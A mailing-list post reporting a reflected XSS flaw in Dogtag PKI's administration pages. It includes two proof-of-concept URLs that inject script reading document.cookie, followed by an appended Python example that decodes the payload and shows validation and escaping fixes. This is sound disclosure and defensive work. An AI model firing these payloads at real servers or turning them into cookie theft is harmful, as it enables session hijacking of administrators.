[Pki-users] XSS attacks on the web administration page (port 9180, port 9444)

Thibaut Pouzet thibaut.pouzet at lyra-network.com
Wed May 6 12:58:15 UTC 2015


Hi,

We are using the Dogtag PKI tool packaged through IPA on CentOS 6.6.
Here is the system information:
* pki-ca-9.0.3-38.el6_6.noarch
* pki-setup-9.0.3-38.el6_6.noarch

$ uname -a
Linux ipa_server 2.6.32-504.12.2.el6.x86_64 #1 SMP Wed Mar 11 22:03:14
UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

$ cat /etc/redhat-release
CentOS release 6.6 (Final)

It appears that the administration page is vulnerable to XSS attacks,
whether through the SSL administration page or the non-SSL
administration page. Here is the PoC:
* http://ipa_server:9180/ca/ee/ca/profileSelect?profileId=plop%3C/script%3E%3Cscript%3Evar%20x=document.cookie;alert%28x%29;//
* https://ipa_server:9444/ca/ee/ca/profileSelect?profileId=plop%3C/script%3E%3Cscript%3Evar%20x=document.cookie;alert%28x%29;//

I cannot seem to find any trace of this problem on Google. Am I missing
something? Is it the same for other people?

Cheers,


-- 
Thibaut Pouzet
Lyra Network
Systems and Network Engineer
(+33) 5 31 22 40 08
www.lyra-network.com
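
The report above, worked as an added example (not part of the original post and not Dogtag code): it decodes the posted `profileId` value and shows an allow-list check and script-context output encoding that neutralise it. It assumes the parameter is echoed into an inline script block, which the leading `</script>` in the PoC suggests; `TEMPLATE`, the allow-list pattern and all function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# First PoC URL from the post, used here as the sample input.
POC_URL = "http://ipa_server:9180/ca/ee/ca/profileSelect?profileId=plop%3C/script%3E%3Cscript%3Evar%20x=document.cookie;alert%28x%29;//"

# Constructed stand-in for a page that echoes the parameter into an inline
# script; the real Dogtag template is not shown in the post (assumption).
TEMPLATE = '<script>var profileId = "{value}";</script>'

# Hypothetical allow-list for profile identifiers.
PROFILE_ID_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

def profile_id_from_url(url):
    """Return the URL-decoded profileId query parameter ('' if absent)."""
    query = parse_qs(urlsplit(url).query, separator="&")
    return query.get("profileId", [""])[0]

def is_valid_profile_id(value):
    """Reject anything that is not a plain identifier before it is used."""
    return PROFILE_ID_RE.fullmatch(value) is not None

def js_string_escape(value):
    """Encode for a JavaScript string literal inside an HTML script element.

    ASCII letters, digits, space, '_', '.' and '-' pass through; everything
    else becomes \\uXXXX (UTF-16 code units), so no '<', '/', quote or
    backslash reaches the HTML or JavaScript parser.
    """
    out = []
    for ch in value:
        if ch.isascii() and (ch.isalnum() or ch in " _.-"):
            out.append(ch)
            continue
        units = ch.encode("utf-16-be")
        for i in range(0, len(units), 2):
            out.append("\\u%04x" % int.from_bytes(units[i:i + 2], "big"))
    return "".join(out)

def render_vulnerable(value):
    return TEMPLATE.format(value=value)  # raw echo: markup in value is live

def render_hardened(value):
    return TEMPLATE.format(value=js_string_escape(value))
```

Quoting alone is not enough in this context: the HTML parser ends the script element at the first `</script>` regardless of JavaScript string quoting, which is why the encoder escapes `<` and `/` as well as quotes.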



